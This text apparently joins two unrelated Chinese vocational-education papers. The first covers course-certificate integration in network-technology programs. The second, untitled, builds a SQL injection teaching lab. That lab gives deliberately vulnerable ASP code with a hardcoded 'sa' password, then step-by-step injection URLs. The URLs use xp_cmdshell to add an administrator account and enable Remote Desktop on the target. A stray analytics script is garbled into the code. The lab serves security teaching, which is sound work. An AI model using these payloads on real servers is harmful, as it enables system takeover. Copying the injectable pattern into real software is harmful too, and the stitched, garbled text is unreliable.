随着市场竞争日益激烈,愈来愈多的用人单位由过去单纯看重应聘人员的学历层次转而看重其实际技能水平,而应聘者是否拥有相应的职业资格证书无疑是评测其技能水平最快捷的方法。这一转变对高职教育是契机,也是挑战。
1996年颁布的《中华人民共和国职业教育法》第八条规定:“各职业院校都要实行学历证书、培训证书和职业资格证书制度”。2004年,教育部《关于以就业为导向深化高等职业教育改革的若干意见》提出:“大力推行‘双证书’制度,促进人才培养模式改革,在高等职业院校大力推行职业资格证书制度”。2011年,教育部《关于充分发挥行业指导作用推进职业教育改革发展的意见》中提出:要推进建立和完善“双证书”制度,实现学历证书与职业资格证书对接。以上法规及政策为“双证制度”的推行提供了相关的法律依据。
“课证融合”将职业资格标准要求引入常规的教学体系,为学生免去了社会认证培训的高额费用,在减轻学生经济负担的同时可切实提高学生的就业竞争力。所以,一经推出便广受好评。因此,在高职院校推行“课证融合”已逐渐成为实施“双证”制度的主要方式。
“课证融合”的现状
以网络技术专业为例。许多高职院校都在推行该专业“课证融合”的教学改革,但在实施过程中却呈现出诸多乱相,主要表现为:(1)认证繁多,鱼龙混杂。计算机网络技术方面的国家级证书包括全国计算机等级考试、计算机高新技术认证、计算机软件专业技术资格等多种证书。企业认证更是种类繁杂,各种证书的水平良莠不齐,有的甚至质量低下。学生在应聘时展示此类证书,用人单位根本不予认可。(2)教材陈旧,多以理论为主。目前,许多高职网络技术专业教材仍然以理论知识为主,属压缩型的本科教材,涉及的许多技术也早已被市场淘汰。虽然某些教材增加了实训内容,但理论与实践脱节,可操作性差。(3)师资滞后,教师实践经验匮乏。“课证融合”的教学团队多以校内教师为主,因教学任务重、下企业难、挂职锻炼的相关待遇无法落实等客观原因,使得专业教师下企业锻炼的机会和时间较少,无法胜任培养职业人才的重任。校方外聘的兼职教师虽是技术专家,但往往只是做一两个讲座或上一两次课,流于表面,很难深入地对其教学质量予以监控。(4)实训环节薄弱,资金支持不够。网络技术专业的实操性很强,但许多高职院校对实训设施的投入明显不足,在经济欠发达地区这种情形尤为严重。教师只得采用免费的仿真软件进行教学,但这些仿真软件往往质量不高,漏洞频出,难以为学生提供形象真实的工作环境体验。
“课证融合”教学改革的实践探索
我院网络技术专业本着“以就业岗位为导向,以职业能力为本位,以资格认证为载体”的原则,自2008年起推行了针对计算机网络组建及安全维护方向的“课证融合”教学改革。经过反复总结与实践,笔者提出了“岗位逆推认证品牌,三元共促课证融合”的教改模式,其具体框架如图1所示。
岗位逆推认证品牌 网络技术的认证名目繁多,选择何种证书是“课证融合”教学改革首先需处理的问题,也是决定“课证融合”成败的首要问题。“岗位逆推法”具体如下:首先根据本专业对应的就职岗位(如网络管理员),由劳动力市场圈定此类岗位对应的有公信力的认证品牌及合适的认证级别,如此逆推并遴选出来的认证可直指就业,学生及社会认可度较高。另外,在上述圈定出的相关证书中,还应考虑到认证费用的因素,如思科认证虽然在网络行业内被普遍认可,但因其价格较高,成为该项认证在高职院校推广“课证融合”的“瓶颈”。经反复权衡,我们选择了H3C系列认证。一则H3C公司作为网络设备的著名品牌,其产品在国内占据了可观的市场份额,其广泛的销售及合作伙伴要求其从业人员具有相关资格证书。且H3C认证是通过国际认证机构向全球核发认证,运作严谨规范,具有较强的公信力。学生若能通过此认证,将可为其提供一个良好的就业平台。二则按照H3C公司的相关规定,设立H3C网络学院的院校,其学生可以以优惠的价格申请认证,此举大受学生欢迎。三则H3C网络学院体系完善,配套教材及师资培训机制也较为健全,可为“课证融合”的进一步发展奠定坚实基础。综上所述,在确定职业资格认证时,应选择行业普遍认同的、主流的认证,尽量选择知名企业,利用企业的品牌效应,提高证书的含金量。另外要兼顾学生的实际接受水平,因地制宜,最终选择出性价比较高的认证品牌。
三元素共促课证融合 从平面化的资格认证到过程化的课程建设,需要“双师队伍、双证教材、实训基地”三元素共同促进,方能搭建起“课程”与“证书”间的互连桥梁(如上页图1所示),最终实现“课”与“证”二者的无缝对接。
1.“双师”队伍。要落实“课证融合”,应首先培养一支“双师”队伍。此处的“双师”有双重涵义:(1)从教学管理角度看,应调整“双师”结构比例。可大量聘请行业企业的技术专家到学校担任兼职教师,加大兼职教师的比例,逐步形成实践技能课程主要由具有高技能水平的兼职教师讲授的机制。(2)从教师个人角度看,应注意锻造教师个人的“双师”素质。学校的大部分在职教师是具有扎实专业理论的学术型教师,但企业实践经验较少,需要鼓励其到企业参加顶岗实践,直接参与实际工程项目的实施和技术开发工作,丰富其工程经验;而对于实践能力强的兼职教师而言,则应建议其尽快熟练掌握各种教学方法和教学手段,洞悉教育心理及规律,提高教学艺术水平。需要指出的是,有些高职院校一味地增加兼职教师数量而忽视专职教师“双师”素质建设的做法是不足取的。根据我国现有体制,兼职教师主要供职于所在企业,平时项目多,任务重,很难抽出大量的时间和精力投入学校的课程建设中。所以,“课证融合”教学团队的主力军仍是专职教师。专职教师提高自身“双师”素质的具体途径有:(1)校内取经。利用辅助所在学校兼职教师进行教学的机会,向兼职教师虚心求教,学习取经。(2)职业认证。通过考取行业高级从业资格认证,熟悉职业岗位能力要求及职业资格任职标准。(3)项目参与。利用寒暑假或在争取到学校政策支持后,赴相关行业的公司进行为期半年以上的挂职锻炼,或到校企合作单位参加实际项目,获得第一手的项目案例资料,全面了解行业动态及工作流程。
2.双证教材。“双证”教材不同于社会认证教材,也不同于传统的高职教材,应是能同时满足高职学历教育和职业资格认证双重需求的教材。其特征应以职业性内容为主,以学术性内容为辅,以任务引领为出发点,强调职业能力的培养,还需要综合考虑多方面的因素,如知识与应用结合、学时数、学生接受能力等。笔者结合我院网络专业的实际情况,以H3C网络学院教材为蓝本,采用任务驱动模式自行编写了对应的校本教材和讲义,以典型项目案例为任务切入点,在完成工作任务的过程中介绍知识,将教学大纲、教学内容、教法、教案融为一体,成为“四位一体”的教材。这样的教材简明实用,可降低学生学习的难度,提高学生学习的兴趣,贴近我校学生实际。当然,“双证”教材的编撰工作还应实时跟踪企业,吸取行业专家的建议,不断改善校本教材,与时俱进,以适合行业发展需要。
3.实训基地。实训基地是“课证融合”实训教学的重要保障,实训基地建设的好坏直接影响到实践教学的质量和效果。根据网络技术类岗位要求,应建设“学做合一、工作与实训合一、教学与服务合一”的校内生产性实训基地和紧密型校外实习基地。校方应主动联系知名企业,本着“工学结合、优势互补、资源共享、互惠双赢”的原则,争取与之合建共享式实训教学基地。在校内实训基地运行过程中,要探索教师与工程人员的融通、教学实训与项目过程的结合,使实训基地产生自我造血功能,进而深化以工作过程导向的课程体系改革,促进“双师”结构教学团队建设。另外,校方应拓宽校外实训基地的建设渠道,开发校外实训基地的多功能和多用途,建立多类型实训基地,实现校内外实训基地的紧密衔接。比如,通过不定期召开由校企双方主要负责人参加的校外顶岗实训基地工作协调会,完善校外基地实训过程管理的制度化建设,改变校外实训“放羊式”的状况。通过丰富的实训实习环节,使学生在项目实践中产生丰富的感性认知,促进对相关应用操作类认证考题的深入理解和熟练掌握。
实践证明,上述“课证融合”模式的教学改革工作已初见成效,学生就业竞争力明显增强,但高职网络专业“课证融合”的教学改革仍属初级阶段,笔者提出的某些方式和方法仍需进一步深入论证和完善。
参考文献:
[1]章安平.基于职业导向的“课证融合”人才培养模式研究与实践[M].北京:高等教育出版社,2009.
[2]高林,许远,张方.职业院校“双证书”教学工作的研究——关于职业技术教育教学改革的思考[J].中国职业技术教育,2006(5).
[3]姜大源.职业教育学研究新论[M].北京:教育科学出版社,2008.
作者简介:
李益(1974—),女,浙江嵊州人,硕士,北京政法职业学院讲师,研究方向为计算机网络系统集成、计算机网络安全。
关键词:高职院校;SQL注入攻击;实验环境;网络安全
中图分类号:G712 文献标识码:A 文章编号:1672-5727(2013)12-0168-03
研究意义
SQL注入攻击是黑客攻击最常用的手段之一,其危害极大。一些不具备很多网络安全技术的“脚本小子”,使用一些傻瓜式SQL注入攻击工具,就可能攻陷网站,进而控制服务器。
高职院校的《网络安全与防范》课程,具有培养学生掌握较高网络安全防范技能的任务。因此,必须使学生掌握好SQL注入攻击的防范措施。而为了真正掌握SQL注入攻击的防范措施,又必须透彻理解SQL注入攻击的原理和具体实施步骤。经验表明,这是一个教学难点,因为它需要精心构造SQL语句,来完成信息的查询、语句的执行等。
我们开展了一项教学改革,旨在提高《网络安全与防范》课程的教学效果。该教学改革中的一项内容,就是研究如何更好地开展SQL注入攻击的教学。我们认为,如果能够搭建一个简单的具有SQL注入漏洞的动态网站,让学生对这个网站进行模拟攻击,对于学生更好地掌握SQL注入攻击的原理和具体实施步骤具有很大好处,也能让他们更好地掌握相应的安全防范措施。
SQL注入攻击实验环境的搭建
我们使用VMware WorkStation虚拟机软件安装了两台虚拟机,一台虚拟机安装的是Windows Server 2003操作系统,用于模拟被攻击的服务器,IP地址为192.168.248.132;另一台虚拟机安装的是Windows XP操作系统,用于模拟黑客使用的攻击机,IP地址为192.168.248.133。在Windows Server 2003虚拟机上,搭建了一个使用ASP+SQL Server 2000开发的简单的动态网站。我们设计该动态网站的思路是:该网站具有SQL注入漏洞,能满足SQL注入攻击的实验要求;该网站应该尽量简单,以便于学生理解、分析和掌握。
按照以上设计思路,我们开发了一个简单的名为testweb的动态网站。该动态网站需要访问一个名为testweb的数据库,该数据库包含一个表:tblNews。tblNews用来保存新闻的标题和内容,初始时在这个表中输入了一些测试用的数据。它的具体结构如表1所示。
该网站包括以下三个页面:conn.asp、news.asp、displayNews.asp。其中conn.asp用于保存与SQL Server 2000数据库服务器的连接信息;news.asp用于读取数据库中的新闻记录,显示所有新闻的标题,并且将这些标题以超链接的形式显示。当单击某个新闻的标题后,即可以进入形如displayNews.asp?id=xxx的页面,看到新闻的具体内容(其中“xxx”表示某条新闻在tblNews表中ID字段的值)。设置该网站的默认页面为news.asp。
conn.asp的代码如下所示:
Const SqlDatabaseName = "testweb"
Const SqlPassword = "michaeljordan"
Const SqlUsername = "sa"
Const SqlLocalName = "(local)"
dim ConnStr
ConnStr = "Provider = Sqloledb;User ID = " & SqlUsername & ";Password = " & SqlPassword & ";Initial Catalog = " & SqlDatabaseName & ";Data Source = " & SqlLocalName & ";"
news.asp的代码如下所示:
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr
dim strSql
strSql="select * from tblNews"
dim rs
set rs=conn.Execute(strSql)
dim newsID
response.Write("")
response.Write("")
response.Write("")
while not rs.EOF
response.Write("")
response.Write("")
newsID=rs("ID")
response.Write(" " & rs("title")& " ")
response.Write("")
response.Write("")
rs.MoveNext
wend
response.Write("")
response.Write("var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-22575914-1']);_gaq.push(['_setDomainName', '']);_gaq.push(['_trackPageview']);(function () {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'ssl' : 'www') + '/ga.js';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();var _userid = '';var _siteid =75;var _istoken = 1;var _model = 'Model03'; WebPageSpeed =2828; UrchinTrack();")
response.Write("")
rs.close()
conn.close
set rs=nothing
set conn=nothing
%>
displayNews.asp的代码如下所示:
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr
dim newsID
newsID=request("id")
dim strSql
strSql="select * from tblNews where ID=" & newsID
dim rs
set rs=conn.Execute(strSql)
response.Write(rs("content"))
rs.close()
conn.close
set rs=nothing
set conn=nothing
%
从以上三个页面的具体代码可以看出,我们所设计的动态网站具有简单,易于理解、分析和掌握的优点。
同时页面displayNews.asp有SQL注入漏洞,可以满足SQL注入攻击的实训需要,其具有SQL注入漏洞的具体语句为:strSql="select * from tblNews where ID=" & newsID,该语句根据某条新闻的ID查询tblNews表的内容。我们可以在形如displayNews.asp?id=xxx的地址后面加入精心构造的语句,从而执行特定的SQL语句,控制服务器。
SQL注入攻击实验环境的使用
如上所述,我们开发的动态网站testweb具有SQL注入漏洞,下面我们通过具体的入侵步骤来展示该SQL注入攻击实验环境的使用。(以下攻击步骤参考了相关网络安全书籍的内容。)
(一)判断网站是否有SQL注入漏洞
可以通过在displayNews.asp?id=1后加上“’”、“ and 1=1”和“ and 1=2”等方法来判断网站是否有SQL注入漏洞。如在地址栏输入:http://192.168.248.132/testweb/displayNews.asp?id=1’ (1)
页面返回如下错误信息:
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 '' 之前有未闭合的引号。
/testweb/displayNews.asp,行 13
从以上提示信息可以看出,数据库服务器为SQL Server。(1)的原理是:正常的SQL语句为select * from tblNews where ID=1,而(1)导致SQL语句成为:select * from tblNews where ID=1’,这样会使得单引号没有闭合而出错。
在地址栏输入:http://192.168.
248.132/testweb/displayNews.asp?id=1 and 1=1 (2)
返回正常页面。而在地址栏输入:http://192.168.248.132/testweb/displayNews.asp?id=1 and 1=2
(3)
返回的错误信息是:
ADODB.Field 错误 '80020009'
BOF 或 EOF 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
/testweb/displayNews.asp,行 0
(2)导致SQL语句成为:select * from tblNews where ID=1 and 1=1,因为1=1为永真式,所以不影响原来的查询结果,返回正常页面。而(3)导致SQL语句成为:select * from tblNews where ID=1 and 1=2,因为1=2为永假式,所以查询结果为空,而程序中没有对此进行处理,所以导致出现错误提示信息。
通过以上测试,可以明确地知道网站存在SQL注入漏洞,而且数据库服务器为SQL Server。
(二)查找是否有xp_cmdshell扩展存储过程
在地址栏输入:http://192.168.
248.132/testweb/displayNews.asp?id=
1 and exists(select * from master.dbo.sysobjects where name=’xp_
cmdshell’)
页面返回正常,从而知道master.dbo.sysobjects表中存在扩展过程xp_cmdshell。通过执行xp_cmdshell存储过程可以实现添加用户、将用户添加到管理员组、开启远程终端连接等许多操作。
(三)通过xp_cmdshell添加系统管理员账户
在地址栏输入:http://192.168.
248.132/testweb/displayNews.asp?id=
1;exec master..xp_cmdshell ‘net user test test/add’ (4)
页面返回正常。执行该语句后,可以添加一个名为test,密码也为test的账户。(4)的原理是:通过xp_cmdshell扩展存储过程,执行net user命令,实现添加账户的操作。
在地址栏输入:http://192.168.
248.132/testweb/displayNews.asp?id=1;exec master..xp_cmdshell ‘net localgroup administrators test /add’
页面返回正常。执行该语句后,可以将账户test添加到系统管理员组。
(四)开启目标计算机的远程终端连接
在地址栏输入:http://192.168.
248.132/testweb/displayNews.asp?id=
1;exec master..xp_cmdshell ‘reg add “HKLM\System\CurrentControl-
Set\Control\Terminal Server”/v fDeny
TSConnections/t REG_DWORD /d 0/f’ (5)
页面返回正常。执行完后,可以开启目标计算机的远程终端连接。(5)的原理是:通过xp_cmdshell扩展存储过程,执行reg add语句,完成修改注册表,开启远程终端连接的操作。执行完以上步骤之后,即可以使用新建的test账号远程登录目标计算机192.168.248.132。
讨论
为了使学生掌握SQL注入攻击的原理、具体实施步骤和相应的防范措施,必须搭建实验环境让他们演练SQL注入攻击的实施步骤。为此,我们搭建了一个ASP+SQL Server 2000环境下的SQL Server注入攻击实验环境。我们没有使用Dvbbs等现成的动态网站,因为这些动态网站功能较齐全,但代码很复杂,不利于初学者理解、分析和掌握。我们设计的动态网站具有简单,易于学生理解、分析和掌握的优点。我们演示了在该实验环境中进行SQL注入攻击,判断是否存在SQL注入漏洞,判断数据库服务器是否支持xp_cmdshell扩展过程,使用xp_cmdshell添加系统管理员账号、开启远程终端连接、使用攻击机远程登录目标计算机等操作。这表明使用我们搭建的简单的SQL注入攻击实验环境,可以方便地进行SQL注入攻击演练。这对提高学生的学习兴趣,掌握SQL注入攻击的原理和具体的实施步骤,提高网络安全防护意识等都具有很大的好处。
同时,利用该实验环境,或者对该实验环境稍微进行扩展,我们还可以进行更多的SQL注入攻击演练,如猜解数据库、表、字段的数目、字段的名称、字段的内容等等。
我们的教学经验表明,通过使用这个简单的实验环境,教学效果能得到明显的提升。
参考文献:
[1]肖遥.大中型网络入侵要案直击与防御[M].北京:电子工业出版社,2011.
[2]朱锡华,刘月铧,侯伟.暗战亮剑——黑客渗透与防御全程实录[M].北京:人民邮电出版社,2010.
[3]武新华,陈艳艳,王英英.矛与盾:黑客攻防与脚本编程[M].北京:机械工业出版社,2010.
